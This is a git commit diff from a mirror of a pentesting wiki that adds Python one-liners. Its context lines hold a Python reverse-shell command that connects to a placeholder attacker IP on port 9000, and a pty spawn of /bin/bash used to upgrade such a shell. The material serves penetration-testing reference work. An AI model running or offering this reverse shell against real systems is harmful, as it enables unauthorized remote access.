mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
Added one liners from @pentestcli
This commit is contained in:
@@ -17,4 +17,8 @@ python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.sock
|
||||
|
||||
**Spawn bash shell prompt**
|
||||
```python
|
||||
python -c 'import pty; pty.spawn("/bin/bash")'```
|
||||
python -c 'import pty; pty.spawn("/bin/bash")'```
|
||||
|
||||
***Print all ASCII characters***
|
||||
```python
|
||||
python -c 'import string; print string.printable'```
|
||||
|
||||
Reference in New Issue
Block a user